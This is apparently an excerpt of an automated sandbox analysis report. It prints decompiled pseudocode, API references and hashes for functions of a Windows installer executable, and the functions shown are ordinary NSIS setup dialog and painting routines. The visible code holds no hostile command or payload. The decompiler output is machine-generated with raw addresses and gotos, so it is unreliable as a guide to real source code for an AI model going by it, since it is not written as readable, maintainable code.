								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42d24c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x42d260;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42d24c = 0;
								 *0x42d260 = 0;
								 *0x434f60 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404ED4();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x42d260;
									_t201 =  *0x434f28;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x434f2c <= 0) {
										L86:
										if( *0x434fbe == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										_t202 =  *0x433edc; // 0x5c9122
										if( *((intOrPtr*)(_t202 + 0x10)) != 0) {
											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x434f2c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x42d260);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x434f60 = _t291;
					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
					 *0x42d254 =  *0x42d254 | 0xffffffff;
					_t297 = _t258;
					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42d24c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404499(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404499(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x434f2c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x42d260 + _t300 * 4) = _t284;
									_v16 =  *( *0x42d260 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x434f2c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004044CE(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004044CE(_v12);
								L93:
								return E00404500(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404F1E
GetDlgItem.USER32(?,00000408), ref: 00404F29
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F8A
SetWindowLongW.USER32(?,000000FC,00405513), ref: 00404FA3
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
DeleteObject.GDI32(00000000), ref: 00405000
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102

Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC

SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
GetWindowLongW.USER32(?,000000F0), ref: 00405144
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00405152
ShowWindow.USER32(?,00000005), ref: 00405162
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
ImageList_Destroy.COMCTL32(?), ref: 00405330
GlobalFree.KERNEL32(?), ref: 00405340
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
SendMessageW.USER32(?,00001102,?,?), ref: 00405462
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
ShowWindow.USER32(?,00000000), ref: 004054EA
GetDlgItem.USER32(?,000003FE), ref: 004054F5
ShowWindow.USER32(00000000), ref: 004054FC

Strings

N, xrefs: 0040519B
, xrefs: 004054D4
M, xrefs: 004050BA

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
Instruction ID: 669472b6e39b4296dbb294a81ed98d86f32f22d8abeb4cff7518c6a892085abf
Opcode Fuzzy Hash: 749bdf8e43bd841ecb3e5c95033ce80d775c45143b483fe0b3b59f6494973967
Instruction Fuzzy Hash: EF028A70900608EFDB20DFA9DD45AAF7BB5FB84314F10817AE610BA2E0D7799942DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404658 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00404658(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t111;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x42b234 =  *0x42b234 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E00404500(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x432ea0;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404907(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x434f08, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x434f08, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x42b234 != 0) {
						goto L27;
					} else {
						_t69 =  *0x42c240; // 0x5c5bc4
						_t29 = _t69 + 0x14; // 0x5c5bd8
						_t116 = _t29;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004044BB(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004048E3();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t111 =  *0x433edc; // 0x5c9122
					_t75 =  *(_t111 - 4 + _t75 * 4);
				}
				_t76 =  *0x434f38 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404609;
				if(_t110 != 2) {
					_v8 = E004045CF;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E00404499(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E00404499(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004044BB( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004044CE(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x434f10 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x42b234 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x42b234 = 0;
				return 0;
			}

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046F6
GetDlgItem.USER32(?,000003E8), ref: 0040470A
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404727
GetSysColor.USER32(?), ref: 00404738
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404746
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404754
lstrlenW.KERNEL32(?), ref: 00404759
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404766
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040477B
GetDlgItem.USER32(?,0000040A), ref: 004047D4
SendMessageW.USER32(00000000), ref: 004047DB
GetDlgItem.USER32(?,000003E8), ref: 00404806
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404849
LoadCursorW.USER32(00000000,00007F02), ref: 00404857
SetCursor.USER32(00000000), ref: 0040485A
LoadCursorW.USER32(00000000,00007F00), ref: 00404873
SetCursor.USER32(00000000), ref: 00404876
SendMessageW.USER32(00000111,00000001,00000000), ref: 004048A5
SendMessageW.USER32(00000010,00000000,00000000), ref: 004048B7

Strings

N, xrefs: 004047F4
Call, xrefs: 00404835

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
Instruction ID: e0aa441e67ff77812dea5cfa76c138b5706349c0d06c8e95e02877fce1cb63d1
Opcode Fuzzy Hash: ce357ac6e0fd4f2b4f67e04795876aef6a46bd5fea1783cb4cf669a44dc9f0f8
Instruction Fuzzy Hash: 1A61A3B5900209BFDB10AF60DD85E6A7BA9FB44314F00843AFB05B62D0D778A951DF98

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x434f10;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x433f00, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x434f08;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00433F00,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 0000000B.00000002.1051604681.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000B.00000002.1051581324.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051656194.0000000000408000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051685036.000000000040A000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051751302.0000000000416000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051823202.0000000000422000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051875531.000000000042C000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051910610.0000000000431000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051943011.0000000000442000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1051974881.000000000045F000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000B.00000002.1052007077.0000000000461000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_400000_wqs.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
Instruction ID: e457e53e67a16f607b198c8be77aa7e47a8fd9e6aa67a1a07366d16d1d2d9a76
Opcode Fuzzy Hash: 15a6b7738402934ac822911e252168026e8f0364f08849f6e110b85e8bc9718e
Instruction Fuzzy Hash: 0E418B71800209AFCF058FA5DE459AF7FB9FF44315F04802AF991AA1A0C738AA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040498A Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				WCHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				WCHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				short* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				WCHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed int* _t160;
				struct HWND__* _t166;
				struct HWND__* _t167;
				int _t169;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x42c240; // 0x5c5bc4
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x436000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405B81(0x3fb, _t146);
					E004067C4(_t146);
				}
				_t167 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405B81(0x3fb, _t146);
							if(E00405F14(_t186, _t146) == 0) {
								_v8 = 1;
							}
							E0040653D(0x42b238, _t146);
							_t87 = E0040690A(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E0040653D(0x42b238, _t146);
								_t89 = E00405EB7(0x42b238);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 = 0;
								}
								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t169 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x42b238) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405E58(0x42b238);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160;
									 *_t159 = 0x5c;
									if(_t159 != 0x42b238) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t169 = 0x400;
								L36:
								_t95 = E00404E27(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x433edc; // 0x5c9122
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404E0F(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextW(_a4, _t169, 0x42b228);
									} else {
										E00404D46(_t169, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x434fa4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t169) != 0) {
									_v8 = _t158;
								}
								E004044BB(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42d258 == _t158) {
									E004048E3();
								}
								 *0x42d258 = _t158;
								goto L53;
							}
						}
						_t186 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t167;
							_v72 = 0x42d268;
							_v60 = E00404CE0;
							_v56 = _t146;
							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderW(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405E0C(_t146);
								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == 0x440800) {
									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
										lstrcatW(_t146, 0x432ea0);
									}
								}
								 *0x42d258 =  *0x42d258 + 1;
								SetDlgItemTextW(_t167, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t166 = GetDlgItem(_t167, 0x3fb);
					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
						E00405E0C(_t146);
					}
					 *0x433ed8 = _t167;
					SetWindowTextW(_t166, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00404499(_t167);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00404499(_t167);
					E004044CE(_t166);
					_t138 = E0040690A(8);
					if(_t138 == 0) {
						L53:
						return E00404500(_a8, _a12, _a16);
					} else {
						 *_t138(_t166, 1);
						goto L8;
					}
				}
			}

APIs

GetDlgItem.USER32(?,000003FB), ref: 004049D9
SetWindowTextW.USER32(00000000,?), ref: 00404A03
SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
CoTaskMemFree.OLE32(00000000), ref: 00404ABF
lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,?), ref: 00404AF1
lstrcatW.KERNEL32(?,Call), ref: 00404AFD
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B0F

Part of subcall function 00405B81: GetDlgItemTextW.USER32(?,?,00000400,00404B46), ref: 00405B94

Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75B53420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
Part of subcall function 004067C4: CharNextW.USER32(?,00000000,75B53420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
Part of subcall function 004067C4: CharPrevW.USER32(?,?,75B53420,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E

GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
